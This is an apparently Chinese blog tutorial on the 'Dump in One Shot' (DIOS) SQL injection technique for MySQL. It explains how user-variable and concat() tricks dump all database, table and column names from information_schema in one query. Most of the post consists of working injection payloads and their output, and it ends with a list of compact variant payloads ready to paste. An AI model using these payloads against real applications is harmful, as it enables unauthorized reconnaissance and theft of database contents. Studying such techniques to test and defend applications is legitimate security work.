Dump in One Shot

Edit by Qsaka
如有不對(duì)的地方,歡迎各位大牛賜教。還望輕噴 :)

本文將來(lái)介紹Dump in One Shot(DIOS)這種SQL注入手法

例子

先來(lái)看一個(gè)例子

(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.schemata) where 
(@a) in (@a:=concat(@a,schema_name,'<br>'))))a)

上面的SQL語(yǔ)句會(huì)一次性返回所有數(shù)據(jù)庫(kù)的名稱

+-------------------------------------------------------------------------------------+
| (@a)                                                                                |
+-------------------------------------------------------------------------------------+
|  information_schema<br>mysql<br>performance_schema<br>t3st<br>test<br>yii2basic<br> |
+-------------------------------------------------------------------------------------+
1 row in set (0.00 sec)

請(qǐng)先仔細(xì)想想這條語(yǔ)句是如何執(zhí)行的,再看下面的分析

原理分析

先讓我們從最內(nèi)層開始,分析這條語(yǔ)句是如何執(zhí)行的

 (@a:=concat(@a,schema_name,'<br>'))

首先你要知道@a是一個(gè)變量。concat()@a,schema_name,'</br>'三者進(jìn)行拼接,:=是賦值操作。但是有一點(diǎn)你需要注意,只要concat()中有NULL時(shí),都會(huì)返回NULL

mysql> select @a;
+------+
| @a   |
+------+
| NULL |
+------+
1 row in set (0.00 sec)    
mysql> select (@a:=concat(@a,schema_name,'<br>')) from information_schema.schemata;
+-------------------------------------+
| (@a:=concat(@a,schema_name,'<br>')) |
+-------------------------------------+
| NULL                                |
| NULL                                |
| NULL                                |
| NULL                                |
| NULL                                |
| NULL                                |
+-------------------------------------+
6 rows in set (0.00 sec)

所以執(zhí)行時(shí)先要對(duì)@a進(jìn)行賦值。這也就是本文例子中為什么要select(@a:=0x00)的原因。

mysql> set @a:=0x00;
Query OK, 0 rows affected (0.00 sec)

mysql> select (@a:=concat(@a,schema_name,'<br>')) from information_schema.schemata;
+-------------------------------------------------------------------------------------+
| (@a:=concat(@a,schema_name,'<br>'))                                                 |
+-------------------------------------------------------------------------------------+
|  information_schema<br>                                                             |
|  information_schema<br>mysql<br>                                                    |
|  information_schema<br>mysql<br>performance_schema<br>                              |
|  information_schema<br>mysql<br>performance_schema<br>t3st<br>                      |
|  information_schema<br>mysql<br>performance_schema<br>t3st<br>test<br>              |
|  information_schema<br>mysql<br>performance_schema<br>t3st<br>test<br>yii2basic<br> |
+-------------------------------------------------------------------------------------+
6 rows in set (0.00 sec)

再看包含這條concat()從句的語(yǔ)句

select (@a) from (information_schema.schemata) where (@a)in (@a:=concat(@a,schema_name,'<br>'))

這是一條SQL中的 where in 語(yǔ)句。但是請(qǐng)仔細(xì)想一想,這和通常的 where in 語(yǔ)句是不是有些區(qū)別?@a既不是一個(gè)字段的名稱,in 后面也不是可能取到的值集合。
好吧,如果你糾結(jié)在這里,你就輸了(′?`*) 。

mysql> (select (@a) from (select(@a:=0x00),(select (‘hahaha’) from (information_schema.schemata) where ('biubiubiu') in (@a:=concat(@a,schema_name,'<br>'))))a);
+-------------------------------------------------------------------------------------+
| (@a)                                                                                |
+-------------------------------------------------------------------------------------+
|  information_schema<br>mysql<br>performance_schema<br>t3st<br>test<br>yii2basic<br> |
+-------------------------------------------------------------------------------------+
1 row in set (0.00 sec)

同樣返回了所有數(shù)據(jù)庫(kù)名稱。是不是覺(jué)得很神奇( ̄▽ ̄)"。其實(shí)(select(@a:=0x00),(select (@a) from (information_schema.schemata) where (@a) in (@a:=concat(@a,schema_name,'<br>'))))這條語(yǔ)句的作用僅僅是不斷的將schema_name字段中的值追加到@a變量中,而不是返回一個(gè)有效的結(jié)果集。最終我們是通過(guò)變量@a來(lái)得到所有的數(shù)據(jù)庫(kù)名

mysql> (select(@a:=0x00),(select (@a) from (information_schema.schemata) where (@a) in (@a:=concat(@a,schema_name,'<br>'))));
+------------+----------------------------------------------------------------------------------------------------+
| (@a:=0x00) | (select (@a) from (information_schema.schemata) where (@a) in (@a:=concat(@a,schema_name,'<br>'))) |
+------------+----------------------------------------------------------------------------------------------------+
|            | NULL                                                                                               |
+------------+----------------------------------------------------------------------------------------------------+
1 row in set (0.00 sec)

mysql> select @a;
+-------------------------------------------------------------------------------------+
| @a                                                                                  |
+-------------------------------------------------------------------------------------+
|  information_schema<br>mysql<br>performance_schema<br>t3st<br>test<br>yii2basic<br> |
+-------------------------------------------------------------------------------------+
1 row in set (0.00 sec)

獲取所有的表名

(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.tables) where (@a)in (@a:=concat(@a,table_name,'<br>'))))a);

獲取非information_schema中的表

(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.tables) where table_schema!='information_schema' and(@a)in (@a:=concat(@a,table_name,'<br>'))))a)

獲取數(shù)據(jù)庫(kù)與表的關(guān)系

(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.tables) where table_schema!='information_schema' and(@a)in (@a:=concat(@a,table_schema,0x3a,table_name,'<br>'))))a)

一次性返回?cái)?shù)據(jù)庫(kù)的所有信息

(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.columns) where table_schema!='information_schema' and(@a)in (@a:=concat(@a,table_schema,' > ',table_name,' > ',column_name,'<br>'))))a)

進(jìn)行模糊匹配查詢

(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.columns)where table_schema!='information_schema' and table_name like 'SHOP%' and(@a)in (@a:=concat(@a,table_schema,' > ',table_name,' > ',column_name,'<br>'))))a)

更多的DIOS姿勢(shì)

(select(@)from(select(@:=0x00),(select(@)from(information_schema.columns)where(@)in(@:=concat(@,0x3C62723E,table_name,0x3a,column_name))))a)  

(select(select concat(@:=0xa7,(select count(*)from(information_schema.columns)where(@:=concat(@,0x3c6c693e,table_name,0x3a,column_name))),@)))  

(Select export_set(5,@:=0,(select count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))  

(select 1,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@))

Reference

DIOS (Dump in One Shot) Explained
DIOS (Dump in One Shot) Explained Part 2
DIOS the SQL Injectors Weapon (Upgraded)

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請(qǐng)結(jié)合常識(shí)與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡(jiǎn)書系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

友情鏈接更多精彩內(nèi)容